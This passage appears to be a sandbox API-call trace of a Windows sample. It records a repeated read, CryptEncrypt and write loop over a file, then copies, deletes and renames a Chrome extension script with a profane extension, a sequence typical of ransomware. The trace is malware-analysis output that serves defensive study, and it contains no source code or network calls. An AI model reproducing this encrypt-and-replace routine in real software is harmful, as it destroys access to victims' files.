dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.438] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.438] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.438] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.438] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.439] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.439] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.439] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.439] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.439] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.439] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.440] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.440] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.441] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.441] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.441] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.441] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.441] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.442] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.442] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.442] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.442] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.442] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.442] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.443] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.443] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.444] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.444] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.444] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.444] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.444] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.444] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.444] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x1ae, lpOverlapped=0x0) returned 1 [0258.444] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1ae, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x1b0) returned 1 [0258.444] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x1b0, lpOverlapped=0x0) returned 1 [0258.444] CloseHandle (hObject=0x5d64) returned 1 [0258.444] CloseHandle (hObject=0x5d50) returned 1 [0258.444] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), bFailIfExists=0) returned 1 [0258.452] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js", dwFileAttributes=0x0) returned 1 [0258.452] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.gsg")) returned 1 [0258.454] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\craw_background.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 